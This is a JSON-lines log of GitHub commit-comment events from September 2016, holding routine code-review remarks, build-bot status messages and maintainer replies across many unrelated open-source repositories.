{"id":"4572596582","type":"CommitCommentEvent","actor":{"login":"dreammed"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19049854,"position":null,"line":null,"path":null,"commit_id":"db7ad8647dbb51a3c3bcbe15dd98a65081cd53f3","created_at":"2016-09-16T07:36:45Z","updated_at":"2016-09-16T07:36:45Z","body":"i found a bug i will release at night\r\nneed more work with Tesseractor"}},"created_at":"2016-09-16T07:36:45Z"}
{"id":"4572596905","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19049855,"position":null,"line":null,"path":null,"commit_id":"f2f2c2eaac4a4f254c589095794f1a5dab7f38cb","created_at":"2016-09-16T07:36:51Z","updated_at":"2016-09-16T07:36:51Z","body":"os_2_0_develop_linux (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-f2f2c2eaac4a4f254c589095794f1a5dab7f38cb-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-f2f2c2eaac4a4f254c589095794f1a5dab7f38cb-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-16T07:36:51Z"}
{"id":"4572598844","type":"CommitCommentEvent","actor":{"login":"jypma"},"repo":{"name":"chrism333/yalla"},"payload":{"comment":{"id":19049860,"position":20,"line":93,"path":"include/yalla/device/atmega8/avr/io.hpp","commit_id":"b19472b48a16609b4eec4342cf20f00c9190f170","created_at":"2016-09-16T07:37:23Z","updated_at":"2016-09-16T07:37:23Z","body":"It's based on classes declaring a `Handler` typedef member, which declares on what interrupts they act. See an example [here](https://github.com/jypma/AvrLib/blob/master/apps/GardenSensor/GardenSensor.hpp#L64). These handlers can delegate to each other, i.e. a class can have members that themselves have interrupt handlers. I've also made the concept of an interrupt itself abstract, so there's API compatibility between AVR \"real\" external interrupts and the \"pin change\" interrupts that in reality share one vector.\r\n\r\nOn the top-level though, there's unfortunately need for a bit of macro magic, since avr-gcc wants precise `extern \"C\"` methods with exact names for the vectors.\r\n\r\nI'll start writing proper docs for \"my\" AvrLib once I make up my mind between that, yalla, and xpcc :-)"}},"created_at":"2016-09-16T07:37:23Z"}
{"id":"4572601062","type":"CommitCommentEvent","actor":{"login":"dira"},"repo":{"name":"poloniculmov/hammer"},"payload":{"comment":{"id":19049867,"position":41,"line":46,"path":"app/controllers/products_controller.rb","commit_id":"b68ee55c01f58a3ad99bc761035eaf21fa227183","created_at":"2016-09-16T07:38:02Z","updated_at":"2016-09-16T07:38:02Z","body":"I think you can still use the short syntax with `redirect_to [@feed, @product], ...`"}},"created_at":"2016-09-16T07:38:02Z"}
{"id":"4572601822","type":"CommitCommentEvent","actor":{"login":"tano14"},"repo":{"name":"tano14/arrui"},"payload":{"comment":{"id":19049869,"position":3,"line":4,"path":"app/js/services/fichas.services.js","commit_id":"57c62d821234c8addba26e5dc061b30f0bf7ac22","created_at":"2016-09-16T07:38:15Z","updated_at":"2016-09-16T07:38:15Z","body":"Ya se que no es una subida oficial, pero por las dudas te digo. Pone el mismo nombre del fichero js al factory."}},"created_at":"2016-09-16T07:38:15Z"}
{"id":"4572602893","type":"CommitCommentEvent","actor":{"login":"SCdF"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19049870,"position":10,"line":592,"path":"static/css/inbox.less","commit_id":"044f134f89ef1dda288338e2481245367574ca39","created_at":"2016-09-16T07:38:33Z","updated_at":"2016-09-16T07:38:33Z","body":"ahh cool, new to less, cheers for the pointer!"}},"created_at":"2016-09-16T07:38:33Z"}
{"id":"4572606301","type":"CommitCommentEvent","actor":{"login":"dira"},"repo":{"name":"poloniculmov/hammer"},"payload":{"comment":{"id":19049877,"position":18,"line":18,"path":"app/controllers/products_controller.rb","commit_id":"b68ee55c01f58a3ad99bc761035eaf21fa227183","created_at":"2016-09-16T07:39:35Z","updated_at":"2016-09-16T07:39:35Z","body":"DRY-ing up the multiple calls to `@feed.products` would make the code more resilient and maintainable."}},"created_at":"2016-09-16T07:39:35Z"}
{"id":"4572607294","type":"CommitCommentEvent","actor":{"login":"SCdF"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19049878,"position":5,"line":587,"path":"static/css/inbox.less","commit_id":"044f134f89ef1dda288338e2481245367574ca39","created_at":"2016-09-16T07:39:53Z","updated_at":"2016-09-16T07:39:53Z","body":"Can't agree more. I pulled these values from the design mockups. I'll re-create it with em."}},"created_at":"2016-09-16T07:39:53Z"}
{"id":"4572607589","type":"CommitCommentEvent","actor":{"login":"jypma"},"repo":{"name":"chrism333/yalla"},"payload":{"comment":{"id":19049880,"position":20,"line":93,"path":"include/yalla/device/atmega8/avr/io.hpp","commit_id":"b19472b48a16609b4eec4342cf20f00c9190f170","created_at":"2016-09-16T07:39:59Z","updated_at":"2016-09-16T07:39:59Z","body":"And there's a non-delegating, actual, interrupt handler definition in the [Button class](https://github.com/jypma/AvrLib/blob/master/inc/Mechanic/Button.hpp#L50)."}},"created_at":"2016-09-16T07:39:59Z"}
{"id":"4572609356","type":"CommitCommentEvent","actor":{"login":"pkishen"},"repo":{"name":"sysgain/bosh-azure-template"},"payload":{"comment":{"id":19049890,"position":5,"line":8,"path":"azuredeploy.json","commit_id":"b8b7fb8de50ee11a40a109157badbab7bce286e3","created_at":"2016-09-16T07:40:28Z","updated_at":"2016-09-16T07:40:28Z","body":"Can you add descriptions for all these. Also can you clear with names please Ex; ApigeeManagamentUI"}},"created_at":"2016-09-16T07:40:28Z"}
{"id":"4572611178","type":"CommitCommentEvent","actor":{"login":"pkishen"},"repo":{"name":"sysgain/bosh-azure-template"},"payload":{"comment":{"id":19049896,"position":17,"line":18,"path":"azuredeploy.json","commit_id":"b8b7fb8de50ee11a40a109157badbab7bce286e3","created_at":"2016-09-16T07:40:58Z","updated_at":"2016-09-16T07:40:58Z","body":"Is apigee administer name missing?"}},"created_at":"2016-09-16T07:40:58Z"}
{"id":"4572611422","type":"CommitCommentEvent","actor":{"login":"cgogolin"},"repo":{"name":"PanPalitta/phase_estimation"},"payload":{"comment":{"id":19049898,"position":241,"line":241,"path":"src/phase_loss_rand.cpp","commit_id":"297d4afdcfea38048ac7e741cff894764efff41b","created_at":"2016-09-16T07:41:03Z","updated_at":"2016-09-16T07:41:03Z","body":"It can be single or multi mode. We know it works for >=2 modes and having many modes doesn't seem to make it better, so the most interesting case is probably the 2 mode case. In that case you would fix the particle number to some value, say 4 and the the Hilbert from which you want to draw a random state is that complex span of {|04>,|13>,|22>,|31>,|40>}, i.e., the symmetric sub-space of four two level systems, or in other words the space of four bosons in two modes. I am not entirely sure which vectors the elements `input_state[n]` correspond to, "}},"created_at":"2016-09-16T07:41:03Z"}
{"id":"4572616275","type":"CommitCommentEvent","actor":{"login":"mashers"},"repo":{"name":"mashers/3DSafe"},"payload":{"comment":{"id":19049912,"position":null,"line":null,"path":null,"commit_id":"0dda7592669282f684b7c37553303e18076244b4","created_at":"2016-09-16T07:42:24Z","updated_at":"2016-09-16T07:42:24Z","body":"* No longer errors if booting without SD card - PIN lock still usable\r\n* If arm9loaderhax.bin is not present at the root of the SD card, 3DSafe will look for arm9loaderhax.bin at the root of CTRNAND\r\n* If this file is present on CTRNAND, 3DSafe will boot it\r\n* If the payload is present on neither the SD card nor CTRNAND, an error will be displayed"}},"created_at":"2016-09-16T07:42:24Z"}
{"id":"4572617885","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19049920,"position":null,"line":null,"path":null,"commit_id":"10e34c5f35b71410cee7de6cdec5d1dc63c1379a","created_at":"2016-09-16T07:42:50Z","updated_at":"2016-09-16T07:42:50Z","body":"ASIHPValidation (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-10e34c5f35b71410cee7de6cdec5d1dc63c1379a-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-16T07:42:50Z"}
{"id":"4572619015","type":"CommitCommentEvent","actor":{"login":"vcherukuri"},"repo":{"name":"sysgain/bosh-azure-template"},"payload":{"comment":{"id":19049923,"position":17,"line":18,"path":"azuredeploy.json","commit_id":"b8b7fb8de50ee11a40a109157badbab7bce286e3","created_at":"2016-09-16T07:43:10Z","updated_at":"2016-09-16T07:43:10Z","body":"No. Admin name, key,are same for both pcf and apigee. Thats what Jeenal\ndidnt want to repeat the inputs.\n\nOn Fri, Sep 16, 2016 at 1:10 PM, Parthu K <notifications@github.com> wrote:\n\n> Is apigee administer name missing?\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/sysgain/bosh-azure-template/commit/b8b7fb8de50ee11a40a109157badbab7bce286e3#commitcomment-19049896>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ASxiu2pGN8jY59k3Gm_sms39mHLgXkFQks5qqkgKgaJpZM4J-q75>\n> .\n>\n"}},"created_at":"2016-09-16T07:43:10Z"}
{"id":"4572621797","type":"CommitCommentEvent","actor":{"login":"timchen119"},"repo":{"name":"timchen119/fwupd"},"payload":{"comment":{"id":19049933,"position":null,"line":null,"path":null,"commit_id":"9e54c62a5a37e30f49da8e1ef6366b3d303a05ef","created_at":"2016-09-16T07:43:58Z","updated_at":"2016-09-16T07:43:58Z","body":"Thanks for the suggestions. Yes, I plan to polish it a bit and send PR."}},"created_at":"2016-09-16T07:43:58Z"}
{"id":"4572622607","type":"CommitCommentEvent","actor":{"login":"kilrah"},"repo":{"name":"opentx/opentx"},"payload":{"comment":{"id":19049936,"position":22,"line":53,"path":"tools/nightly22/build-nightly.sh","commit_id":"5254f0cc7ba0e87ab60c3f50fde6b84c8b663c0d","created_at":"2016-09-16T07:44:12Z","updated_at":"2016-09-16T07:44:12Z","body":"Isn't there a typo, window**s** ?"}},"created_at":"2016-09-16T07:44:12Z"}
{"id":"4572622643","type":"CommitCommentEvent","actor":{"login":"dira"},"repo":{"name":"poloniculmov/hammer"},"payload":{"comment":{"id":19049937,"position":4,"line":4,"path":"app/extra/csv_parser.rb","commit_id":"2fbb3ec379152bdfbf615f23123e75fe663af7a2","created_at":"2016-09-16T07:44:12Z","updated_at":"2016-09-16T07:44:12Z","body":"Why does the file need to reside public path in order for `CSVParser` to work?"}},"created_at":"2016-09-16T07:44:12Z"}
{"id":"4572625005","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19049944,"position":null,"line":null,"path":null,"commit_id":"f2f2c2eaac4a4f254c589095794f1a5dab7f38cb","created_at":"2016-09-16T07:44:56Z","updated_at":"2016-09-16T07:44:56Z","body":"os_2_0_develop_linux (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-f2f2c2eaac4a4f254c589095794f1a5dab7f38cb-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-16T07:44:56Z"}
{"id":"4572627040","type":"CommitCommentEvent","actor":{"login":"lordloki"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":19049947,"position":8,"line":403,"path":"source/gameengine/Ketsji/KX_KetsjiEngine.cpp","commit_id":"85ddb546fbafca6d79967826ba50469d0ea01451","created_at":"2016-09-16T07:45:33Z","updated_at":"2016-09-16T07:45:33Z","body":"Sorry, I mean SCA_Joystick instead of DEV_Joystick.\r\n\r\nI tried to make a patch yesterday following your recommendations (loop over all joysticks, true when notice an add or remove, etc).  The issue here is that we have so few parameters to pass, I explain:\r\n\r\n- returning true, only informs that you need to add or remove\r\n- addrem only pass the index\r\nThen we have the issue that we have an index but we don't know if we have to add or to remove it.\r\n\r\nTo solve this we have to make a static index variable in KX_PythonInit. This way we can pass the addrem array with info about all joysticks index and compare it against static index variable to add or remove joysticks.\r\n\r\nBut at last this is more complicated than we have know (I think)."}},"created_at":"2016-09-16T07:45:33Z"}
{"id":"4572627521","type":"CommitCommentEvent","actor":{"login":"dira"},"repo":{"name":"poloniculmov/hammer"},"payload":{"comment":{"id":19049948,"position":20,"line":20,"path":"app/extra/csv_parser.rb","commit_id":"2fbb3ec379152bdfbf615f23123e75fe663af7a2","created_at":"2016-09-16T07:45:40Z","updated_at":"2016-09-16T07:45:40Z","body":"Why it is part of the contract of the method to output this information?\r\n\r\nI think this is the job of the caller, not of the parser."}},"created_at":"2016-09-16T07:45:40Z"}
{"id":"4572630794","type":"CommitCommentEvent","actor":{"login":"d"},"repo":{"name":"d/bug-free-fortnight"},"payload":{"comment":{"id":19049958,"position":null,"line":null,"path":null,"commit_id":"f2d3d3bdac67b0d635bf274eebd8051c563c6dd7","created_at":"2016-09-16T07:46:43Z","updated_at":"2016-09-16T07:46:43Z","body":"There currently is no way to show logs unless it fails. A pull request is welcome.\r\n\r\nOr not."}},"created_at":"2016-09-16T07:46:43Z"}
{"id":"4572632497","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaLang/Homebrew.jl"},"payload":{"comment":{"id":19049962,"position":null,"line":null,"path":null,"commit_id":"2975acf61d45930a44869d9a9a201e15c13ef2f8","created_at":"2016-09-16T07:47:14Z","updated_at":"2016-09-16T07:47:14Z","body":"fails on 0.5, `Base.Git` doesn't exist any more"}},"created_at":"2016-09-16T07:47:14Z"}
{"id":"4572633180","type":"CommitCommentEvent","actor":{"login":"timchen119"},"repo":{"name":"timchen119/efivar"},"payload":{"comment":{"id":19049963,"position":null,"line":null,"path":null,"commit_id":"331e4102249987e93e88185ae9e3103b5a2b9404","created_at":"2016-09-16T07:47:26Z","updated_at":"2016-09-16T07:47:26Z","body":"Yes I will send PR to upstream."}},"created_at":"2016-09-16T07:47:26Z"}
{"id":"4572638679","type":"CommitCommentEvent","actor":{"login":"djflsdl08"},"repo":{"name":"djflsdl08/WebStudy"},"payload":{"comment":{"id":19049984,"position":null,"line":null,"path":null,"commit_id":"e9014f576359cd5ecd1136722e06658950819639","created_at":"2016-09-16T07:48:59Z","updated_at":"2016-09-16T07:48:59Z","body":"2nd Week"}},"created_at":"2016-09-16T07:48:59Z"}
{"id":"4572645129","type":"CommitCommentEvent","actor":{"login":"dira"},"repo":{"name":"poloniculmov/hammer"},"payload":{"comment":{"id":19049997,"position":21,"line":22,"path":"app/extra/csv_parser.rb","commit_id":"3899712510e1702eaccb6e597c5b1b5df8432bf6","created_at":"2016-09-16T07:50:50Z","updated_at":"2016-09-16T07:50:50Z","body":"Why does this method sanitize a `csv_row`? Isn't the row parameter just a Hash?"}},"created_at":"2016-09-16T07:50:50Z"}
{"id":"4572646667","type":"CommitCommentEvent","actor":{"login":"ike-dai"},"repo":{"name":"tech-sketch/zabbix_aws_template"},"payload":{"comment":{"id":19050004,"position":113,"line":49,"path":"lambda_code/AWS_Lambda.py","commit_id":"6e2844f5b4d2f37459aac7732ac1933f193a31c1","created_at":"2016-09-16T07:51:16Z","updated_at":"2016-09-16T07:51:16Z","body":"この前に「response[\"instance_id\"] = instanceid」を入れておいても良いね。"}},"created_at":"2016-09-16T07:51:16Z"}
{"id":"4572646724","type":"CommitCommentEvent","actor":{"login":"dira"},"repo":{"name":"poloniculmov/hammer"},"payload":{"comment":{"id":19050005,"position":22,"line":23,"path":"app/extra/csv_parser.rb","commit_id":"3899712510e1702eaccb6e597c5b1b5df8432bf6","created_at":"2016-09-16T07:51:17Z","updated_at":"2016-09-16T07:51:17Z","body":"What are the advantages and disadvantages of dynamic whitelisting?"}},"created_at":"2016-09-16T07:51:17Z"}
{"id":"4572651066","type":"CommitCommentEvent","actor":{"login":"flaviocopes"},"repo":{"name":"getgrav/grav-plugin-comments"},"payload":{"comment":{"id":19050018,"position":null,"line":null,"path":null,"commit_id":"7b4f3a4e8db0fc894a67da23a328d39239c06cb6","created_at":"2016-09-16T07:52:34Z","updated_at":"2016-09-16T07:52:34Z","body":"Fix #37 "}},"created_at":"2016-09-16T07:52:34Z"}
{"id":"4572651765","type":"CommitCommentEvent","actor":{"login":"kawikadkekahuna"},"repo":{"name":"braddahboots/react-native-form"},"payload":{"comment":{"id":19050022,"position":21,"line":25,"path":"src/components/DropDown.js","commit_id":"398e8450f869f2989ad0c7b0c80d694efe7bfb7a","created_at":"2016-09-16T07:52:46Z","updated_at":"2016-09-16T07:52:46Z","body":"Radio buttons are associated with answer options, so the map should look for text instead of name.\r\n"}},"created_at":"2016-09-16T07:52:46Z"}
{"id":"4572653608","type":"CommitCommentEvent","actor":{"login":"bgos10"},"repo":{"name":"flar2/android_kernel_oneplus_msm8996"},"payload":{"comment":{"id":19050031,"position":null,"line":null,"path":null,"commit_id":"1ae896956188fe5c40a5192727147e5d74c63629","created_at":"2016-09-16T07:53:18Z","updated_at":"2016-09-16T07:53:18Z","body":"Hi @flar2  thanks for Sound Control , Added to my ROM (with Proper Credits) also bought EKM (Amazing App), thanks for your hard work. It works Great.\r\nLink to thread : http://forum.xda-developers.com/oneplus-3/development/rom-t3457741"}},"created_at":"2016-09-16T07:53:18Z"}
{"id":"4572656185","type":"CommitCommentEvent","actor":{"login":"TrySound"},"repo":{"name":"gaearon/redux-thunk"},"payload":{"comment":{"id":19050038,"position":null,"line":null,"path":null,"commit_id":"41aefcc28a80d2b21f8ee1e68639757bf6d7ba49","created_at":"2016-09-16T07:54:04Z","updated_at":"2016-09-16T07:54:04Z","body":"@QuotableWater7 It's just an extension to work with external API and be able to mock that in tests."}},"created_at":"2016-09-16T07:54:04Z"}
{"id":"4572658015","type":"CommitCommentEvent","actor":{"login":"sgerrand"},"repo":{"name":"FundingCircle/kafka-compose"},"payload":{"comment":{"id":19050042,"position":null,"line":null,"path":null,"commit_id":"3c086241edaaa785079d347241bb054e5dbfdecc","created_at":"2016-09-16T07:54:35Z","updated_at":"2016-09-16T07:54:35Z","body":"> these messages will not end up on any partition\r\n\r\n🙋  This should be \"these messages will end up on _the default_ partition\"."}},"created_at":"2016-09-16T07:54:35Z"}
{"id":"4572661044","type":"CommitCommentEvent","actor":{"login":"ipersoft"},"repo":{"name":"comune-desio/azuredesio"},"payload":{"comment":{"id":19050055,"position":null,"line":null,"path":null,"commit_id":"2c4b6a6b95f17ac89cb68d9555cbc888ae3a4195","created_at":"2016-09-16T07:55:27Z","updated_at":"2016-09-16T07:55:27Z","body":"@olistik comunque non funziona, controlla il risultato con adesso.php"}},"created_at":"2016-09-16T07:55:27Z"}
{"id":"4572665119","type":"CommitCommentEvent","actor":{"login":"kawikadkekahuna"},"repo":{"name":"braddahboots/react-native-form"},"payload":{"comment":{"id":19050062,"position":21,"line":25,"path":"src/components/DropDown.js","commit_id":"398e8450f869f2989ad0c7b0c80d694efe7bfb7a","created_at":"2016-09-16T07:56:37Z","updated_at":"2016-09-16T07:56:37Z","body":"Ignore the comment."}},"created_at":"2016-09-16T07:56:37Z"}
{"id":"4572666324","type":"CommitCommentEvent","actor":{"login":"adeas31"},"repo":{"name":"vwaurich/OMEdit"},"payload":{"comment":{"id":19050069,"position":7,"line":209,"path":"OMEdit/OMEditGUI/Animation/AnimationWindow.cpp","commit_id":"1e1497aee9e2b217559b15d9de2c0b2c5cb16c70","created_at":"2016-09-16T07:56:58Z","updated_at":"2016-09-16T07:56:58Z","body":"We shouldn't specify a directory here. The function `StringHandler::getOpenFileName` remembers the last opened directory and uses it if no directory is specified.\r\nLets say I want to open a file located at desktop then I have to go to desktop location every time."}},"created_at":"2016-09-16T07:56:58Z"}
{"id":"4572666421","type":"CommitCommentEvent","actor":{"login":"bcosca"},"repo":{"name":"bcosca/fatfree-core"},"payload":{"comment":{"id":19050070,"position":49,"line":1941,"path":"base.php","commit_id":"55bd6400e29cfc04783cfb929cd67f0fc31e9752","created_at":"2016-09-16T07:56:59Z","updated_at":"2016-09-16T07:56:59Z","body":"You're absolutely right. Thanks for the oversight. Fixed in 34a98f0"}},"created_at":"2016-09-16T07:56:59Z"}
{"id":"4572667209","type":"CommitCommentEvent","actor":{"login":"ike-dai"},"repo":{"name":"tech-sketch/zabbix_aws_template"},"payload":{"comment":{"id":19050073,"position":93,"line":29,"path":"lambda_code/AWS_Lambda.py","commit_id":"6e2844f5b4d2f37459aac7732ac1933f193a31c1","created_at":"2016-09-16T07:57:14Z","updated_at":"2016-09-16T07:57:14Z","body":"checkInstanceStateという名称だとreturnがインスタンスの状態に関する情報が返ってくる印象を受ける。\r\nこの関数では「操作対象の状態であるかを確認している」ということなのでそれがわかるような名付けにするか、関数名はそのままでrunningやstopped、もしくはその他の状態を返すだけの関数にする感じで良いかも。"}},"created_at":"2016-09-16T07:57:14Z"}
{"id":"4572671772","type":"CommitCommentEvent","actor":{"login":"poloniculmov"},"repo":{"name":"poloniculmov/hammer"},"payload":{"comment":{"id":19050084,"position":22,"line":23,"path":"app/extra/csv_parser.rb","commit_id":"3899712510e1702eaccb6e597c5b1b5df8432bf6","created_at":"2016-09-16T07:58:29Z","updated_at":"2016-09-16T07:58:29Z","body":"It handles adding fields to Product automatically, but you have to be careful to update the method when you have attributes that you want to protect. \r\n"}},"created_at":"2016-09-16T07:58:29Z"}
{"id":"4572674139","type":"CommitCommentEvent","actor":{"login":"poloniculmov"},"repo":{"name":"poloniculmov/hammer"},"payload":{"comment":{"id":19050090,"position":21,"line":22,"path":"app/extra/csv_parser.rb","commit_id":"3899712510e1702eaccb6e597c5b1b5df8432bf6","created_at":"2016-09-16T07:59:10Z","updated_at":"2016-09-16T07:59:10Z","body":"I don't get this question? Are we talking about the naming?  The row parameter is a hash, but it's a representation of a csv row."}},"created_at":"2016-09-16T07:59:10Z"}
{"id":"4572674935","type":"CommitCommentEvent","actor":{"login":"mattcaswell"},"repo":{"name":"openssl/openssl"},"payload":{"comment":{"id":19050095,"position":null,"line":null,"path":null,"commit_id":"3c0c68ae460e947aaae5702bda6258fb812e1029","created_at":"2016-09-16T07:59:24Z","updated_at":"2016-09-16T07:59:24Z","body":"Yes, that was one of the solutions we originally considered. That's what I'm planning to do now...out of interest what limit did you set?"}},"created_at":"2016-09-16T07:59:24Z"}
{"id":"4572676324","type":"CommitCommentEvent","actor":{"login":"IzabellaRaulin"},"repo":{"name":"jcooklin/snap"},"payload":{"comment":{"id":19050100,"position":13,"line":753,"path":"control/control.go","commit_id":"a8fe8a22371daf7a4f527137f511c7dc0df21aa0","created_at":"2016-09-16T07:59:49Z","updated_at":"2016-09-16T07:59:49Z","body":"In _getMetricsAndCollectors_ this `config` retrived from \"config.Tree\" represents configuration declared in task manifest. That means, that there is no config for **collector plugins**. Why - because collectors are special kind of plugins that in task manifest we declared configuration for them via using metrics:\r\n```\r\n\"config\": {\r\n                \"/intel/mock\": {\r\n                    \"name\": \"root\",\r\n                    \"password\": \"secret\"\r\n                }\r\n            },\r\n```\r\nTo sum up, line 753 can be change to \"config: cdata.NewNode()\" - I confirmed that."}},"created_at":"2016-09-16T07:59:49Z"}
{"id":"4572677891","type":"CommitCommentEvent","actor":{"login":"M1chaelTran"},"repo":{"name":"codefoundries/UniversalRelayBoilerplate"},"payload":{"comment":{"id":19050107,"position":null,"line":null,"path":null,"commit_id":"58d4b2cc1a74691a84ae1fcd8f1f984c914348e3","created_at":"2016-09-16T08:00:17Z","updated_at":"2016-09-16T08:00:17Z","body":"it works!\r\nthank you :+1: "}},"created_at":"2016-09-16T08:00:17Z"}
{"id":"4572681858","type":"CommitCommentEvent","actor":{"login":"thelordoftheboards"},"repo":{"name":"codefoundries/UniversalRelayBoilerplate"},"payload":{"comment":{"id":19050118,"position":null,"line":null,"path":null,"commit_id":"58d4b2cc1a74691a84ae1fcd8f1f984c914348e3","created_at":"2016-09-16T08:01:18Z","updated_at":"2016-09-16T08:01:18Z","body":"Perfect. I will push onto the next version of Rebar. For the time being just make the change in your local copy please and I will make sure it will make it into the main version."}},"created_at":"2016-09-16T08:01:18Z"}
{"id":"4572682511","type":"CommitCommentEvent","actor":{"login":"OskarStark"},"repo":{"name":"FriendsOfSymfony/FOSUserBundle"},"payload":{"comment":{"id":19050126,"position":39,"line":259,"path":"FOSUserEvents.php","commit_id":"301f9cc96cac427e916945ce19860c55484ac2f4","created_at":"2016-09-16T08:01:29Z","updated_at":"2016-09-16T08:01:29Z","body":"Uh you are right, would you like to provide a PR?"}},"created_at":"2016-09-16T08:01:29Z"}
{"id":"4572683002","type":"CommitCommentEvent","actor":{"login":"poloniculmov"},"repo":{"name":"poloniculmov/hammer"},"payload":{"comment":{"id":19050142,"position":4,"line":4,"path":"app/extra/csv_parser.rb","commit_id":"2fbb3ec379152bdfbf615f23123e75fe663af7a2","created_at":"2016-09-16T08:01:36Z","updated_at":"2016-09-16T08:01:36Z","body":"Because it's super tightly coupled with the default Carrierwave settings for simple file storage."}},"created_at":"2016-09-16T08:01:36Z"}
{"id":"4572685968","type":"CommitCommentEvent","actor":{"login":"poloniculmov"},"repo":{"name":"poloniculmov/hammer"},"payload":{"comment":{"id":19050166,"position":20,"line":20,"path":"app/extra/csv_parser.rb","commit_id":"2fbb3ec379152bdfbf615f23123e75fe663af7a2","created_at":"2016-09-16T08:02:27Z","updated_at":"2016-09-16T08:02:27Z","body":"It's a debug thing, it was removed in the latest version\r\n"}},"created_at":"2016-09-16T08:02:27Z"}
{"id":"4572687184","type":"CommitCommentEvent","actor":{"login":"Simn"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19050172,"position":null,"line":null,"path":null,"commit_id":"f0184807ced55335a34b8c68fa3270a465bf0359","created_at":"2016-09-16T08:02:48Z","updated_at":"2016-09-16T08:02:48Z","body":"@ncannasse: I'm not sure if this is accurate, but I was getting some related invalid assumption error."}},"created_at":"2016-09-16T08:02:48Z"}
{"id":"4572687838","type":"CommitCommentEvent","actor":{"login":"igorRovenki"},"repo":{"name":"FriendsOfSymfony/FOSUserBundle"},"payload":{"comment":{"id":19050177,"position":39,"line":259,"path":"FOSUserEvents.php","commit_id":"301f9cc96cac427e916945ce19860c55484ac2f4","created_at":"2016-09-16T08:02:59Z","updated_at":"2016-09-16T08:02:59Z","body":"@OskarStark ok)"}},"created_at":"2016-09-16T08:02:59Z"}
{"id":"4572691804","type":"CommitCommentEvent","actor":{"login":"OskarStark"},"repo":{"name":"FriendsOfSymfony/FOSUserBundle"},"payload":{"comment":{"id":19050185,"position":39,"line":259,"path":"FOSUserEvents.php","commit_id":"301f9cc96cac427e916945ce19860c55484ac2f4","created_at":"2016-09-16T08:04:07Z","updated_at":"2016-09-16T08:04:07Z","body":"Thank you very much @igorRovenki, you can ping me to give you a review"}},"created_at":"2016-09-16T08:04:07Z"}
{"id":"4572695191","type":"CommitCommentEvent","actor":{"login":"targos"},"repo":{"name":"cheminfo/nmr-metadata"},"payload":{"comment":{"id":19050189,"position":null,"line":null,"path":null,"commit_id":"655fb0f1f055193a8107cbdb672d5ebdc1e0a73c","created_at":"2016-09-16T08:05:06Z","updated_at":"2016-09-16T08:05:06Z","body":"no problem. Do you need me to release a new version of this package ?"}},"created_at":"2016-09-16T08:05:06Z"}
{"id":"4572697763","type":"CommitCommentEvent","actor":{"login":"sofusalbertsen"},"repo":{"name":"praqma-training/academy-aar"},"payload":{"comment":{"id":19050191,"position":3,"line":45,"path":"README.md","commit_id":"3fe271ac496b757694e5705085732a559acfc93f","created_at":"2016-09-16T08:05:51Z","updated_at":"2016-09-16T08:05:51Z","body":"Test @JKrag "}},"created_at":"2016-09-16T08:05:51Z"}
{"id":"4572699030","type":"CommitCommentEvent","actor":{"login":"sofusalbertsen"},"repo":{"name":"praqma-training/academy-aar"},"payload":{"comment":{"id":19050197,"position":null,"line":null,"path":null,"commit_id":"3fe271ac496b757694e5705085732a559acfc93f","created_at":"2016-09-16T08:06:13Z","updated_at":"2016-09-16T08:06:13Z","body":"@JKrag "}},"created_at":"2016-09-16T08:06:13Z"}
{"id":"4572708685","type":"CommitCommentEvent","actor":{"login":"jyskweb"},"repo":{"name":"dmitryd/typo3-realurl"},"payload":{"comment":{"id":19050219,"position":null,"line":null,"path":null,"commit_id":"36166de3ce47c2cc8d6ef450f80ca8127d6b7bbd","created_at":"2016-09-16T08:08:45Z","updated_at":"2016-09-16T08:08:45Z","body":"Will there be a fix for 1.13.6 as well?"}},"created_at":"2016-09-16T08:08:45Z"}
{"id":"4572710342","type":"CommitCommentEvent","actor":{"login":"patriknw"},"repo":{"name":"2m/akka"},"payload":{"comment":{"id":19050225,"position":51,"line":203,"path":"akka-remote/src/main/scala/akka/remote/artery/Handshake.scala","commit_id":"7c4573ae36a170cdc4ab935c6c626bcb3d72b389","created_at":"2016-09-16T08:09:14Z","updated_at":"2016-09-16T08:09:14Z","body":"I'd rather swap the if branches, putting == first here, for better readability"}},"created_at":"2016-09-16T08:09:14Z"}
